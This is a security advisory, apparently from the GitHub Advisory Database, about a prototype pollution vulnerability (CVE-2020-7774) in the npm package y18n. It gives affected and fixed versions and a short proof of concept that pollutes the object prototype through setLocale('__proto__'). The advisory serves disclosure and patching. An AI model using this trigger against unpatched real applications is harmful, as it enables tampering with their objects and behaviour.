GHSA-c4w7-xm78-47vh

Prototype Pollution in y18n

At a glance

Published
Updated
CVE
CVE-2020-7774
CVSS_V3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Description

### Overview The npm package `y18n` before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution. ### POC ```js const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true ``` ### Recommendation Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.

Affected packages

PackageVersions
npm · y18nintroduced 0, fixed 3.2.2
npm · y18nintroduced 4.0.0, fixed 4.0.1
npm · y18nintroduced 5.0.0, fixed 5.0.5

References

Sources

SourceLicence
OSV.devCC-BY 4.0 — GitHub Advisory Database